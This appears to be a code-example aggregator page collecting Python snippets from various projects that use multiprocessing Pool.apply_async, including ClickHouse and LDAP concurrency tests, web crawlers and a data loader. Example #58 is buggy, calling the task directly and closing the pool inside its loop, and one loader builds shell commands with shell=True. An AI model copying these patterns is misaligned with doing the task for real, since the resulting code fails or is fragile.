        pool.close()
        for ind in range(len(formatted_address_list)):
            try:
                place_data[ind] = place_data[ind].get()
            except:
                try:
                    place_data[ind] = place_data[ind].get()
                except:
                    continue  #nest tries twice to catch bs

        for ind in range(len(formatted_address_list)):
            log = update_row(conn, place_data[ind], open_ids[ind])
            #print("updated store iD ", open_ids[ind])
            if doBackup == True:
                BACKUP.write(json.dumps(place_data, indent=4))
                BACKUP.write("\r\n")
            if doLog == True:
                for entry in log:
                    LOG.write(entry)
                    LOG.write("\r\n")

        #clean up closed stores
        cur = conn.cursor()
        cur.execute(
            "UPDATE map_store SET live_busyness=NULL WHERE id IN {closed}".
            format(closed=tuple(closed_ids)))
        conn.commit()
        return

Example #50

0

Show file

File: run_cmd.py Project: seahurt/kill-pool

def run_as_thread_pool():
    pool = ThreadPool(3)
    for x in range(10):
        pool.apply_async(worker, args=(x, ))
    pool.close()
    pool.join()

Example #51

0

Show file

def mGanji(urlPage,addr, service):
    """
    获取列表页内容，然后获取列表页中的内容也url，如果能够获取到分页，则在完成获取内容页后进行自调用。
     :param urlPage: 
    :param addr: 
    :param service: 
    :return: 
    """
    #打开一个虚拟桌面
    display = Display(visible=0, size=(800, 800))
    display.start()

    # 获取全部可用代理,status=0
    proxyList = iproxy.find({"status":0}).limit(30)
    if not proxyList:
        time.sleep(600)
        proxyList = iproxy.find({"status": 0})
        if not proxyList:
            sys.exit(0)

    proxy_list = []
    for iii in proxyList:
        proxy_list.append(iii["iproxy"].encode("utf-8"))

    # 拆分代理的ip和端口
    proxy = random.choice(proxy_list)
    ip, port = proxy.split(":")

    print ("当前使用代理 %s:%s，获取列表页：%s" % (ip,port,urlPage))
    logging.info('当前使用代理:%s:%s,获取列表页：%s' % (ip,port,urlPage))
    #设置firefox 的参数，如果是chrome或者其他浏览器这个参数无法通用
    proxy_settings = {'network.proxy.type': 1,
     'network.proxy.no_proxies_on':'172.0.0.0/8,10.0.0.0/8,localhost,127.0.0.0/8,::1',
     'network.proxy.http':ip,'network.proxy.http_port':port,
     'network.proxy.ssl':'172.1.1.1','network.proxy.ssl_port':8080}

    #获取列表页内容，设置了60s的超时
    try:
        #browser = Browser(driver_name="firefox")
        browser = Browser(driver_name="firefox", profile_preferences=proxy_settings,timeout=60)
        browser.driver.set_page_load_timeout(50)
        browser.visit(urlPage)
        time.sleep(5)
    except:
        print ('获取列表页内容失败,errorurl表：%s:%s 列表页：%s' % (ip, port, urlPage))
        logging.info('获取列表页内容失败,errorurl表：%s:%s 列表页：%s' % (ip, port, urlPage))
        errorurl.insert_one({"url": urlPage, "addr": addr, "service": service, "iproxy": proxy})
        try:
            browser.quit()
        except:
            pass

        display.stop()
        return False

    time.sleep(1)

    #匹配两个内容页的列表，并合并列表
    urlList= browser.find_by_xpath('//*[@class="list-noimg"]/div[1]/p[1]/a')
    urlList2 = browser.find_by_xpath('//*[@class="list-img"]/div[1]/a')
    urlList.extend(urlList2)
    #目标内容的url列表
    urls = []
    for ii in  urlList:

        urlss = ii["href"].encode("utf-8")
        #try:
        print ("新增内容页： %s" % urlss)
        logging.info('新增内容页： %s' % (urlss))
        p1 = re.compile('http')
        p2 = re.compile('\d+x?\/$')
        p3 = re.compile('\/[^\/]+\/$')
        p4 = "/#tabl"

        if not re.search(p2, urlss):
            urlss = re.sub(p3, p4, urlss)
            print "网址修正为：%s" % urlss
        #if re.search(p1, urlss) and urlss not in urls:
        if urlss not in urls:
            urls.append(urlss)
            print ("加入待抓取列表：", urlss)
            logging.info('加入待抓取列表： %s' % (urlss))

    pageList= browser.find_by_xpath('//*[@class="pageBox"]/ul/li/a')
    for i in  pageList:
        urlPages = str(i["href"])
        p = r"http"

        try:
            if urlPages not in pagesAll and re.search(p,urlPages) and not urldone.find_one({"url": urlPages}):
                print ("获取到新的列表页:%s" % urlPages)
                logging.info('获取到新的列表页： %s' % (urlPages))
                pagesAll.append(urlPages)
        except:
            print ("Maybe none.")

    #close display broser
    browser.quit()
    display.stop()


    # f = Fetcher(threads=6, addr=addr, service=service)
    from multiprocessing.dummy import Pool as ThreadPool
    pool = ThreadPool(processes=5)
    results = []
    for url in urls:
        result = pool.apply_async(getContent, (url,addr,service))
        results.append(result)
    print ("开始抓取url内容，共%d条。" % len(urls))
    logging.info('开始抓取url内容，共%d条。' % len(urls))
    # pool.close()
    # pool.join()  # 调用join之前，先调用close函数，否则会出错。执行完close后不会有新的进程加入到pool,join函数等待所有子进程结束
    for i in results:
        i.wait()  # 等待线程函数执行完毕

    for i in results:
        if i.ready():  # 线程函数是否已经启动了
            if i.successful():  # 线程函数是否执行成功
                if i.get() == "stop":

                    sys.exit(0)

                #print(i.get())  # 线程函数返回值
    print "Sub-process(es) done."

    pagesDone.append(urlPage)
    urldone.insert_one({"url": urlPage,"addr":addr, "service":service})

    for i in pagesAll:
        if i not in pagesDone:
            mGanji(i, addr, service)
    return True

Example #52

0

Show file

File: test.py Project: yfinkelstein/ClickHouse

def test_rename_distributed_parallel_insert_and_select(started_cluster):
    table_name = 'test_rename_distributed_parallel_insert_and_select'
    try:
        create_distributed_table(node1, table_name)
        insert(node1, table_name, 1000)

        p = Pool(15)
        tasks = []
        for i in range(1):
            tasks.append(
                p.apply_async(rename_column_on_cluster,
                              (node1, table_name, 'num2', 'foo2', 3, True)))
            tasks.append(
                p.apply_async(rename_column_on_cluster,
                              (node1, '%s_replicated' % table_name, 'num2',
                               'foo2', 3, True)))
            tasks.append(
                p.apply_async(rename_column_on_cluster,
                              (node1, table_name, 'foo2', 'foo3', 3, True)))
            tasks.append(
                p.apply_async(rename_column_on_cluster,
                              (node1, '%s_replicated' % table_name, 'foo2',
                               'foo3', 3, True)))
            tasks.append(
                p.apply_async(rename_column_on_cluster,
                              (node1, table_name, 'foo3', 'num2', 3, True)))
            tasks.append(
                p.apply_async(rename_column_on_cluster,
                              (node1, '%s_replicated' % table_name, 'foo3',
                               'num2', 3, True)))
            tasks.append(
                p.apply_async(
                    insert, (node1, table_name, 10, ["num", "foo3"], 5, True)))
            tasks.append(
                p.apply_async(
                    insert, (node2, table_name, 10, ["num", "num2"], 5, True)))
            tasks.append(
                p.apply_async(
                    insert, (node3, table_name, 10, ["num", "foo2"], 5, True)))
            tasks.append(
                p.apply_async(select,
                              (node1, table_name, "foo2", None, 5, True)))
            tasks.append(
                p.apply_async(select,
                              (node2, table_name, "foo3", None, 5, True)))
            tasks.append(
                p.apply_async(select,
                              (node3, table_name, "num2", None, 5, True)))
        for task in tasks:
            task.get(timeout=240)

        rename_column_on_cluster(node1, table_name, 'foo2', 'num2', 1, True)
        rename_column_on_cluster(node1, '%s_replicated' % table_name, 'foo2',
                                 'num2', 1, True)
        rename_column_on_cluster(node1, table_name, 'foo3', 'num2', 1, True)
        rename_column_on_cluster(node1, '%s_replicated' % table_name, 'foo3',
                                 'num2', 1, True)

        insert(node1, table_name, 1000, col_names=['num', 'num2'])
        select(node1, table_name, "num2")
        select(node2, table_name, "num2")
        select(node3, table_name, "num2")
        select(node4, table_name, "num2")
    finally:
        drop_distributed_table(node1, table_name)

Example #53

0

Show file

File: dataset.py Project: gkn1fexxx/sqlflow

def pai_dataset(filename,
                feature_metas,
                feature_column_names,
                label_meta,
                pai_table,
                single_file,
                cache,
                rank=0,
                nworkers=1,
                batch_size=None,
                feature_column_code="",
                raw_data_dir=None):
    from subprocess import Popen, PIPE
    from multiprocessing.dummy import Pool  # ThreadPool
    import queue

    dname = filename
    if single_file:
        dname = filename + '.dir'

    if os.path.exists(dname):
        shutil.rmtree(dname, ignore_errors=True)

    os.mkdir(dname)

    slice_count = get_pai_table_slice_count(pai_table, nworkers, batch_size)

    thread_num = min(int(slice_count / nworkers), 128)

    pool = Pool(thread_num)
    complete_queue = queue.Queue()

    def thread_worker(slice_id):
        p = Popen("{} -m {}".format(sys.executable, __name__),
                  shell=True,
                  stdin=PIPE)
        p.communicate(
            json.dumps([
                dname, feature_metas, feature_column_names, label_meta,
                pai_table, slice_id, slice_count, feature_column_code,
                raw_data_dir
            ]))

        assert p.returncode == 0, "The subprocess raises error when reading data"
        complete_queue.put(slice_id)

    slice_id = rank
    slice_total = 0
    while slice_id < slice_count:
        pool.apply_async(thread_worker, (slice_id, ))
        slice_id += nworkers
        slice_total += 1

    if batch_size is None:
        pool.close()
        pool.join()
        yield load_dmatrix('{0}#{0}.cache'.format(dname) if cache else dname)
        return

    for _ in six.moves.range(slice_total):
        slice_id = complete_queue.get(block=True)
        if not single_file:
            downloaded_file = "./{}/{}.txt".format(dname, slice_id)
            # ignore empty files or the xgb.DMatrix will throw error.
            if Path(downloaded_file).stat().st_size > 0:
                yield load_dmatrix('{0}#{0}.cache'.format(downloaded_file)
                                   if cache else downloaded_file)
                os.unlink(downloaded_file)

    if single_file:

        def merge_files(dir_name, file_name):
            cmd = "cat %s/*.txt > %s" % (dir_name, file_name)
            p = Popen(cmd, shell=True, stdin=PIPE, stderr=PIPE)
            out, err = p.communicate()
            if err:
                raise Exception("merge data files failed: %s" % err)

        merge_files(dname, filename)
        if raw_data_dir:
            merge_files(raw_data_dir, '{}.raw'.format(filename))

        yield load_dmatrix(
            '{0}#{0}.cache'.format(filename) if cache else filename)

    pool.close()
    pool.join()

Example #54

0

Show file

def test_concurrent_alter_with_ttl_move(started_cluster, name, engine):
    try:
        node1.query("""
            CREATE TABLE {name} (
                EventDate Date,
                number UInt64
            ) ENGINE = {engine}
            ORDER BY tuple()
            PARTITION BY toYYYYMM(EventDate)
            SETTINGS storage_policy='jbods_with_external'
        """.format(name=name, engine=engine))

        values = list({random.randint(1, 1000000) for _ in range(0, 1000)})

        def insert(num):
            for i in range(num):
                day = random.randint(11, 30)
                value = values.pop()
                month = '0' + str(random.choice([3, 4]))
                node1.query(
                    "INSERT INTO {} VALUES(toDate('2019-{m}-{d}'), {v})".
                    format(name, m=month, d=day, v=value))

        def alter_move(num):
            def produce_alter_move(node, name):
                move_type = random.choice(["PART", "PARTITION"])
                if move_type == "PART":
                    for _ in range(10):
                        try:
                            parts = node1.query(
                                "SELECT name from system.parts where table = '{}' and active = 1"
                                .format(name)).strip().split('\n')
                            break
                        except QueryRuntimeException:
                            pass
                    else:
                        raise Exception("Cannot select from system.parts")

                    move_part = random.choice(
                        ["'" + part + "'" for part in parts])
                else:
                    move_part = random.choice([201903, 201904])

                move_disk = random.choice(["DISK", "VOLUME"])
                if move_disk == "DISK":
                    move_volume = random.choice(
                        ["'external'", "'jbod1'", "'jbod2'"])
                else:
                    move_volume = random.choice(["'main'", "'external'"])
                try:
                    node1.query(
                        "ALTER TABLE {} MOVE {mt} {mp} TO {md} {mv}".format(
                            name,
                            mt=move_type,
                            mp=move_part,
                            md=move_disk,
                            mv=move_volume))
                except QueryRuntimeException:
                    pass

            for i in range(num):
                produce_alter_move(node1, name)

        def alter_update(num):
            for i in range(num):
                node1.query(
                    "ALTER TABLE {} UPDATE number = number + 1 WHERE 1".format(
                        name))

        def alter_modify_ttl(num):
            for i in range(num):
                ttls = []
                for j in range(random.randint(1, 10)):
                    what = random.choice([
                        "TO VOLUME 'main'", "TO VOLUME 'external'",
                        "TO DISK 'jbod1'", "TO DISK 'jbod2'",
                        "TO DISK 'external'"
                    ])
                    when = "now()+{}".format(random.randint(-1, 5))
                    ttls.append("{} {}".format(when, what))
                try:
                    node1.query("ALTER TABLE {} MODIFY TTL {}".format(
                        name, ", ".join(ttls)))
                except QueryRuntimeException:
                    pass

        def optimize_table(num):
            for i in range(num):
                try:  # optimize may throw after concurrent alter
                    node1.query("OPTIMIZE TABLE {} FINAL".format(name),
                                settings={'optimize_throw_if_noop': '1'})
                    break
                except:
                    pass

        p = Pool(15)
        tasks = []
        for i in range(5):
            tasks.append(p.apply_async(insert, (100, )))
            tasks.append(p.apply_async(alter_move, (100, )))
            tasks.append(p.apply_async(alter_update, (100, )))
            tasks.append(p.apply_async(alter_modify_ttl, (100, )))
            tasks.append(p.apply_async(optimize_table, (100, )))

        for task in tasks:
            task.get(timeout=120)

        assert node1.query("SELECT 1") == "1\n"
        assert node1.query("SELECT COUNT() FROM {}".format(name)) == "500\n"
    finally:
        node1.query("DROP TABLE IF EXISTS {name} NO DELAY".format(name=name))

Example #55

0

Show file

File: engine.py Project: originx-23/spider_frame

class Engine(object):
    def __init__(self):

        #  1. 创建各个模块的对象,
        self.spiders = self.__auto_import(settings.SPIDERS, is_spider=True)

        # 2. 在init方法中, 创建统计器对象
        self.stats_collector = StatsCollector(self.spiders.keys())
        # 3. 把统计器对象通过init方法, 传入到调度器中
        self.scheduler = Scheduler(self.stats_collector)

        self.downloader = Downloader()
        self.pipelines = self.__auto_import(settings.PIPELINES)

        # 初始化爬虫中间件和下载器中间件
        # 1. 修改init方法, 接收爬虫中间件列表 和 下载器中间件列表
        self.spider_middlewares = self.__auto_import(
            settings.SPIDER_MIDDLEWARES)
        self.downloader_middlewares = self.__auto_import(
            settings.DOWNLOADER_MIDDLEWARES)

        # 定义变量, 用于统计总响应数量
        # self.total_response_count = 0

        # 1. 创建线程池对象, 在init方法
        self.pool = Pool()
        # 定义变量, 用于统计起始请求已经结束爬虫数量
        self.start_requests_finished_spider_count = 0

    def __auto_import(self, full_names, is_spider=False):
        """
        根据全类名列表, 创建类对象, 添加到容器中进行返回
        :param full_names: 全类名列表
        :param is_spider:  是不是爬虫, 如果是爬虫返回字典, 否则就返回列表
        :return: 如果是爬虫返回字典, 否则就返回列表
        """
        # 定义变量, 用于存储返回的结果
        # 如果是爬虫, 就是字典, 否则就列表
        instances = {} if is_spider else []

        # 变量full_name, 获取每一个类的全名, 根据全名创建对象, 添加结果集中
        for full_name in full_names:
            # 获取模块名和类名
            module_name, class_name = full_name.rsplit('.', maxsplit=1)
            # 通过模块名, 导入模块
            module = importlib.import_module(module_name)
            # 通过类名, 从模块中取出该类
            cls = getattr(module, class_name)
            # 通过类创建对象
            instance = cls()
            # 把对象存储结果集中
            if is_spider:
                # instance.name: 爬虫名称
                # instance: 爬虫对象
                instances[instance.name] = instance
            else:
                instances.append(instance)

        # 返回对象结果: 如果是爬虫返回是爬虫字典, 其他返回时对象列表
        return instances

    def start(self):
        # 对外提供启动引擎的方法
        # 启动时间
        start = datetime.now()
        logger.info("启动时间: {}".format(start))
        self.__start()
        end = datetime.now()
        logger.info("总请求数量: {}".format(self.stats_collector.request_nums))
        logger.info("起始请求数量: {}".format(
            self.stats_collector.start_request_nums))
        logger.info("被过滤掉请求数量: {}".format(
            self.stats_collector.repeat_request_nums))
        logger.info("总响应处理数量: {}".format(self.stats_collector.response_nums))

        logger.info("结束时间: {}".format(end))
        logger.info("总耗时: {}秒".format((end - start).total_seconds()))

        # 如果开启分布式, 在程序结束时候, 请求统计信息
        if settings.SCHEDULER_PERSIST:
            self.stats_collector.clear()
            # 如果 FP_PERSIST 是True, 就表示开启断点续爬; 当程序结束了, 我们保留Redis数据中的请求和指纹数据
            # 如果FP_PERSIST 是False, 就表示关闭断点续爬, 当前程序结束时候, 就清空Redis数据中的请求和指纹数据
            if not settings.FP_PERSIST:
                # 清空调度器中, 请求队列和指纹容器
                self.scheduler.clear()

    def __error_callback(self, ex):
        # 使用日志模块记录错误信息
        try:
            raise ex
        except Exception as e:
            logger.exception(e)

    def __execute_callback(self, temp):
        # 循环回调, 从而实现不断调用__execute_request_response_item
        self.pool.apply_async(self.__execute_request_response_item,
                              callback=self.__execute_callback,
                              error_callback=self.__error_callback)

    def __start(self):
        # 用于实现启动引擎核心逻辑

        # 2. 在__start方法中, 使用异步来执行__add_start_requests和__execute_request_response_item
        # 1. 添加起始请求到调度器中
        self.pool.apply_async(self.__add_start_requests,
                              error_callback=self.__error_callback)

        # 实现多异步任务
        for i in range(settings.ASYNC_COUNT):
            # 3. 通过异步回调来使用_execute_request_response_item死循环.
            # 2. 用于处理请求, 响应和Item数据的
            # error_callback: 当调用异步任务内部出错了, 就调用error_callback所指定函数
            self.pool.apply_async(self.__execute_request_response_item,
                                  callback=self.__execute_callback,
                                  error_callback=self.__error_callback)

        # 等待异步任务能够开始执行
        time.sleep(0.1)

        while True:
            # 在我们去判断结束条件之前, 等待一下, 从而提高CPU使用效率
            time.sleep(0.1)

            # 如果还有爬虫起始请求还没有走完, 就让程序继续等待
            if self.start_requests_finished_spider_count < len(self.spiders):
                # 跳过本次循环continue后面语言, 继续下一次循环
                continue

            # 3. 退出请求: 条件: 所有请求都处理完了
            # 统计请求总数量 和响应处理的总数量, 如果响应处理的总数量 >= 请求的总数量, 就可以退出了
            # 在哪里统计请求总数量: 由于所有请求都要添加到队列中, 所以在调度器的add_request方法, 中可以统计
            # 在哪里响应处理的总数量: 由于 __execute_request_response_item 是处理响应的, 所可以该方法中进行统计
            # 使用统计器中响应数量和请求数量进行比较
            if self.stats_collector.response_nums >= self.stats_collector.request_nums:
                # 如果响应处理的总数量 >= 请求的总数量, 就可以退出了
                break

    def __execute_request_response_item(self):
        """用于处理请求, 响应和Item数据的"""

        # 1 / 0 # 此处会报错

        # 调用调度器get_request方法, 获取请求对象
        request = self.scheduler.get_request()

        # 获取该请求对应爬虫对象
        spider = self.spiders[request.spider_name]

        for downloader_middleware in self.downloader_middlewares:
            # 调用下载器中间件的process_request方法, 对请求进行处理
            request = downloader_middleware.process_request(request)

        # 调用下载器get_response方法,根据请求获取响应数据
        response = self.downloader.get_response(request)

        #  2.2 把请求中meta 赋值 响应meta
        response.meta = request.meta

        for downloader_middleware in self.downloader_middlewares:
            # 调用下载器中间件的process_response方法, 对响应进行处理
            response = downloader_middleware.process_response(response)

        # 调用爬虫中间件的process_response方法, 对响应进行处理
        for spider_middleware in self.spider_middlewares:
            response = spider_middleware.process_response(response)
        # 调用爬虫parse函数, 传入response, 获取解析数据
        # 处理解析函数, 返回多结果
        #  2.1 如果该请求有callback就使用callback来处理响应数据
        if request.callback:
            results = request.callback(response)
        else:
            # 如果请求没有callback就使用爬虫parse函数进行处理
            results = spider.parse(response)

        # 判断当前结果,是否是可以迭代的, 如果不是把它变为可迭代的
        if not isinstance(results, Iterable):
            results = [results]

        # 来到这里results一定可以迭代的
        for result in results:
            if isinstance(result, Request):
                # 调用爬虫中间件process_request方法, 对请求进行处理
                for spider_middleware in self.spider_middlewares:
                    result = spider_middleware.process_request(result)

                # 给result这个请求指定爬虫名称
                result.spider_name = spider.name

                # 如果解析结果是一个请求对象, 就把这个请求添加到调度器中
                self.scheduler.add_request(result)
            else:
                # 如果不是请求, 我们就认为出来的数据
                # 就调用pipeline的process_item方法进行处理
                for pipeline in self.pipelines:
                    result = pipeline.process_item(result, spider)

        # 每次处理完成一个响应, 就让变量增加1
        self.stats_collector.incr(self.stats_collector.response_nums_key)

    def __add_one_spider_start_requests_callback(self, temp):
        # 每完成要给起始请求, 就该变量增加1
        self.start_requests_finished_spider_count += 1

    def __add_start_requests(self):
        """添加起始请求, 到调度器中"""
        # 调用爬虫的start_requests方法, 获取起始请求对象
        # 由于现在start_requests是一个生成器, 所以要进行遍历

        for spider_name, spider in self.spiders.items():
            # self.__add_one_spider_start_requests(spider, spider_name)
            # 使用异步调用该方法
            self.pool.apply_async(
                self.__add_one_spider_start_requests,
                args=(spider, spider_name),
                callback=self.__add_one_spider_start_requests_callback)

    def __add_one_spider_start_requests(self, spider, spider_name):
        """添加一个爬虫的起始请求到调度器中"""
        for request in spider.start_requests():
            # 设置该请求对应的爬虫名称
            request.spider_name = spider_name

            # 调用爬虫中间的process_request来处理请求
            for spider_middleware in self.spider_middlewares:
                request = spider_middleware.process_request(request)
            # 调用调度器的add_request, 把请求添加到调度器中
            self.scheduler.add_request(request)
            # 使用统计器类统计起始请求的数量
            self.stats_collector.incr(
                self.stats_collector.start_request_nums_key)

Example #56

0

Show file

        )
        training = True

    print("I'm gonna be " + ("training!" if training else "chatting"))
    mode = 0
    if not training:
        mode = getIntInput("Mode: ",
                           [0, 1, 2]) if modeArg is None else int(modeArg)

    tf.reset_default_graph()

    bot = Bot(training)

    if not training:
        pool = Pool(processes=2)
        pool.apply_async(bot.startNet)

        if mode == 2:
            from flask import Flask, jsonify, request
            app = Flask(__name__)

            @app.route("/predict", methods=["POST", "GET"])
            def getAnswer():
                print(request.form)
                response = bot.predict(str(request.form.get("message")))
                return jsonify(response)

            app.run(host="0.0.0.0", port=8213)

        else:
            bot.startChat(mode)

Example #57

0

Show file

File: service.py Project: houruijie/dns

    def _handle_data_message(self, data_list, config):
        '''
        Handle the data of the messaeg using the function of user with different strategy
        :param data_list{list}: the data of message from kafka
        :param config{map}: the config for service
        :return: return the list of map in which showing the situation of handling each single data in data list
        '''

        self.logger.info("Begin to deal data_list with config")
        self.logger.info("Into the function of user")
        config_list = [config for n in range(len(data_list))]
        # 执行策略有："eventlet | thread | process"
        # 执行策略 先判别单个数据的处理是否存在，若存在则使用策略对单条数据处理
        # 若单条数据处理不存在则使用数据集处理函数
        # if self.strategy and self.time_out and self.pool_size:
        #     self.logger.info(str(self.strategy)+"  "+str(self.pool_size)+"   "+str(self.time_out))

        result_list = []

        # 构造传入的数据
        for item in data_list:
            temp_map = {"input": item, "output": None, "error_info": None}
            result_list.append(temp_map)

        # 对于没有设定运行策略，单条数据循环执行需要设置等待的时间
        # 不使用单条执行策略，调用用户的集中执行函数也需要设置等待时间
        # 如果接收到超时信号则会raise错误
        def handler(signum, frame):
            raise AssertionError

        # data_list 和 config_list 为两个参数列表
        # 对于单条数据处理的控制，池中的每个协程、线程、进程 等待若干时间没有返回结果就

        try:
            start_time = time.time()
            if self._handle_input_item == None:
                try:
                    signal.signal(signal.SIGALRM, handler)
                    signal.alarm(self.mult_time_out)
                    result_list = self._handle_input_items(result_list, config)
                    signal.alarm(0)
                except AssertionError:
                    for item in result_list:
                        item["error_info"] = "time_out"

            elif self.strategy == "eventlet":
                # 使用协程池 处理输入数据
                # asyncio uvloop
                loop = asyncio.get_event_loop()
                tasks = []
                for item in result_list:
                    coroutine = self._handle_input_item(item, config)
                    c_to_feature = asyncio.ensure_future(coroutine)
                    tasks.append(c_to_feature)
                loop.run_until_complete(
                    asyncio.wait(tasks,
                                 timeout=self.time_out * len(data_list)))

                temp_result_list = []

                for i in range(0, len(tasks)):
                    try:
                        temp_result = tasks[i].result()
                        temp_result_list.append(temp_result)
                    except asyncio.InvalidStateError:
                        single_result = {
                            "input": data_list[i],
                            "ouput": None,
                            "error_info": "time_out"
                        }
                        temp_result_list.append(single_result)
                result_list = temp_result_list

            elif self.strategy == "thread":
                # 将配置参数统一设置
                part_func = partial(self._handle_input_item, config=config)
                # 使用多线程来处理输入数据
                pool = ThreadPool(self.pool_size)

                results = []

                for item in result_list:
                    result = pool.apply_async(part_func, args=(item, ))
                    results.append(result)

                temp_result_list = []

                for i in range(0, len(results)):
                    try:
                        res = results[i].get(timeout=self.time_out)
                        temp_result_list.append(res)
                    except multiprocessing.TimeoutError:
                        single_result = {
                            "input": data_list[i],
                            "output": None,
                            "error_info": "time_out"
                        }
                        temp_result_list.append(single_result)

                result_list = temp_result_list

                pool.close()
                pool.join()
            else:
                self.logger.info("No strategy")
                temp_result_list = []
                for i in range(0, len(result_list)):
                    try:
                        signal.signal(signal.SIGALRM, handler)
                        signal.alarm(self.time_out)
                        single_result = self._handle_input_item(
                            result_list[i], config)
                        temp_result_list.append(single_result)
                        signal.alarm(0)
                    except AssertionError:
                        single_result = {
                            "input": data_list[i],
                            "output": None,
                            "error_info": 'time_out'
                        }
                        temp_result_list.append(single_result)
                result_list = temp_result_list

            end_time = time.time()

            self.logger.info("Time cost: " + str(end_time - start_time) + "s")
            self.logger.info("The result after handling:")
            self.logger.info(result_list)

            return result_list

        except Exception:
            self.logger.error(
                "Something wrong happened while handling the data_list:  " +
                traceback.format_exc())
            raise

Example #58

0

Show file

from multiprocessing.dummy import Pool
import os
import random
import time
def long_time_task(name):
    print('Run task %s(%s)...'%(name,os.getpid()))
    start=time.time()
    time.sleep(random.random()*3)
    end=time.time()
    print('Task %s runs %0.2f seconds'%(name,(end-start)))
if __name__=='__main__':
    print('Parent process %s'%os.getpid())
    p=Pool(4)
    for i in range(5):
        p.apply_async(long_time_task(i))
        print('waiting for all subprocessing done...')
        p.close()
        p.join()
        print('all process done')

Example #59

0

Show file

        data = data_for_logical_load(llid, plum_dict)
    except:
        print(
            "Error finding the data for this logical load. Either the logical load ID is invalid or this switch wasn't detected on your network. Reinitialize the database using --init"
        )
        continue

    headers = {
        'User-Agent': 'Plum/2.3.0 (iPhone; iOS 9.2.1; Scale/2.00)',
        'X-Plum-House-Access-Token': data["token"]
    }

    if args.on:
        pool.apply_async(plum_command,
                         ("https://%s:%s/v2/setLogicalLoadLevel" %
                          (data["ip"], data["port"]), {
                              "level": 255,
                              "llid": llid
                          }, headers))

    if args.off:
        pool.apply_async(plum_command,
                         ("https://%s:%s/v2/setLogicalLoadLevel" %
                          (data["ip"], data["port"]), {
                              "level": 0,
                              "llid": llid
                          }, headers))
    if args.dim >= 0:
        pool.apply_async(plum_command,
                         ("https://%s:%s/v2/setLogicalLoadLevel" %
                          (data["ip"], data["port"]), {
                              "level": args.dim,

Example #60

0

Show file

def parallel_login(self, server, user_count=10, timeout=200, rbac=False):
    """Check that login of valid and invalid LDAP authenticated users works in parallel.
    """
    self.context.ldap_node = self.context.cluster.node(server)
    user = None

    users = [{
        "cn": f"parallel_user{i}",
        "userpassword": randomword(20)
    } for i in range(user_count)]

    with ldap_users(*users):
        with ldap_authenticated_users(*[{
                "username": user["cn"],
                "server": server
        } for user in users],
                                      rbac=rbac):

            def login_with_valid_username_and_password(users,
                                                       i,
                                                       iterations=10):
                with When(f"valid users try to login #{i}"):
                    for i in range(iterations):
                        random_user = users[random.randint(0, len(users) - 1)]
                        login_and_execute_query(
                            username=random_user["cn"],
                            password=random_user["userpassword"],
                            steps=False)

            def login_with_valid_username_and_invalid_password(
                    users, i, iterations=10):
                with When(
                        f"users try to login with valid username and invalid password #{i}"
                ):
                    for i in range(iterations):
                        random_user = users[random.randint(0, len(users) - 1)]
                        login_and_execute_query(
                            username=random_user["cn"],
                            password=(random_user["userpassword"] +
                                      randomword(1)),
                            exitcode=4,
                            message=
                            f"DB::Exception: {random_user['cn']}: Authentication failed: password is incorrect or there is no user with such name",
                            steps=False)

            def login_with_invalid_username_and_valid_password(
                    users, i, iterations=10):
                with When(
                        f"users try to login with invalid username and valid password #{i}"
                ):
                    for i in range(iterations):
                        random_user = dict(users[random.randint(
                            0,
                            len(users) - 1)])
                        random_user["cn"] += randomword(1)
                        login_and_execute_query(
                            username=random_user["cn"],
                            password=random_user["userpassword"],
                            exitcode=4,
                            message=
                            f"DB::Exception: {random_user['cn']}: Authentication failed: password is incorrect or there is no user with such name",
                            steps=False)

            with When("I login in parallel"):
                p = Pool(15)
                tasks = []
                for i in range(5):
                    tasks.append(
                        p.apply_async(login_with_valid_username_and_password, (
                            users,
                            i,
                            50,
                        )))
                    tasks.append(
                        p.apply_async(
                            login_with_valid_username_and_invalid_password, (
                                users,
                                i,
                                50,
                            )))
                    tasks.append(
                        p.apply_async(
                            login_with_invalid_username_and_valid_password, (
                                users,
                                i,
                                50,
                            )))

            with Then("it should work"):
                for task in tasks:
                    task.get(timeout=timeout)